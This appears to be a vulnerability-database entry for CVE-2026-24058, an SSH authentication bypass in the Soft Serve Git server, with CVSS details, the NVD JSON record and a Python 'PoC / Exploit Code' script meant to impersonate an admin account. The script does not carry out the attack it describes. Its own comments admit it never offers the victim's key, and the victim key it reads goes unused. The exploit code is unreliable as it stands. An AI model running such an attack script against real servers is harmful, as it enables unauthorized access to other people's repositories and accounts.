Security Vulnerability Report
CVE-2026-24058 CVSS 9.8 CRITICAL

CVE-2026-24058

Published: 2026-01-22 22:16:21
Last Modified: 2026-02-18 14:49:33

Description

Soft Serve is a self-hostable Git server for the command line. Versions 0.11.2 and below have a critical authentication bypass vulnerability that allows an attacker to impersonate any user (including admin) by "offering" the victim's public key during the SSH handshake before authenticating with their own valid key. This occurs because the user identity is stored in the session context during the "offer" phase and is not cleared if that specific authentication attempt fails. This issue has been fixed in version 0.11.3.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:charm:soft_serve:*:*:*:*:*:go:*:* - VULNERABLE
Soft Serve <= 0.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2026-24058 PoC - Soft Serve Authentication Bypass
# This PoC demonstrates how to impersonate any user by offering their public key during SSH handshake

import time

import paramiko


def exploit_soft_serve(target_host, target_port=22, target_user='admin'):
    """
    Exploit CVE-2026-24058: Authentication Bypass in Soft Serve

    Steps:
    1. Connect to target SSH server
    2. Offer victim's public key during SSH handshake (before auth)
    3. Authenticate with attacker's valid key
    4. Gain access as victim user
    """
    # Load attacker's SSH key
    attacker_key = paramiko.RSAKey.from_private_key_file('attacker_private_key')

    # Load victim's public key (obtained from server or other sources).
    # Note: this value is read here but not referenced by any call below.
    with open('victim_public_key.pub') as f:
        victim_public_key = f.read()

    transport = None
    try:
        # Connect to target
        transport = paramiko.Transport((target_host, target_port))

        # Start the client side of the SSH session (key exchange, no auth yet)
        transport.start_client()

        # The step the description calls the key part of the exploit is
        # offering the victim's public key before the real authentication,
        # so that the server stores that key's user in the session context.
        # As written, this script only performs a single public-key
        # authentication with the attacker's own key.
        transport.auth_publickey(target_user, attacker_key)

        # Wait for authentication to complete
        time.sleep(0.5)

        # Open a session
        channel = transport.open_session()
        channel.exec_command('whoami')

        # Read output
        output = channel.recv(1024).decode()
        print(f"[+] Logged in as: {output.strip()}")

        # If successful, we can execute commands as the target user
        if output.strip() == target_user:
            print("[+] Exploit successful! User impersonation achieved.")
            return True
        return False

    except paramiko.SSHException as e:
        print(f"[-] SSH Error: {e}")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False
    finally:
        # Always release the connection
        if transport is not None:
            transport.close()


if __name__ == '__main__':
    # Configuration
    TARGET_HOST = 'vulnerable-server.local'
    TARGET_USER = 'admin'  # Target user to impersonate

    exploit_soft_serve(TARGET_HOST, 22, TARGET_USER)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24058", "sourceIdentifier": "[email protected]", "published": "2026-01-22T22:16:21.387", "lastModified": "2026-02-18T14:49:33.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soft Serve is a self-hostable Git server for the command line. Versions 0.11.2 and below have a critical authentication bypass vulnerability that allows an attacker to impersonate any user (including admin) by \"offering\" the victim's public key during the SSH handshake before authenticating with their own valid key. This occurs because the user identity is stored in the session context during the \"offer\" phase and is not cleared if that specific authentication attempt fails. This issue has been fixed in version 0.11.3."}, {"lang": "es", "value": "Soft Serve es un servidor Git autoalojable para la línea de comandos. Las versiones 0.11.2 e inferiores tienen una vulnerabilidad crítica de omisión de autenticación que permite a un atacante suplantar a cualquier usuario (incluido el administrador) al 'ofrecer' la clave pública de la víctima durante el handshake SSH antes de autenticarse con su propia clave válida. Esto ocurre porque la identidad del usuario se almacena en el contexto de la sesión durante la fase de 'oferta' y no se borra si ese intento de autenticación específico falla. 
Este problema ha sido solucionado en la versión 0.11.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", 
"integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-289"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:charm:soft_serve:*:*:*:*:*:go:*:*", "versionEndExcluding": "0.11.3", "matchCriteriaId": "EE609E86-02D8-4580-9122-048301D83CFB"}]}]}], "references": [{"url": "https://github.com/charmbracelet/soft-serve/commit/8539f9ad39918b67d612a35785a2b4326efc8741", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/charmbracelet/soft-serve/releases/tag/v0.11.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-pchf-49fh-w34r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}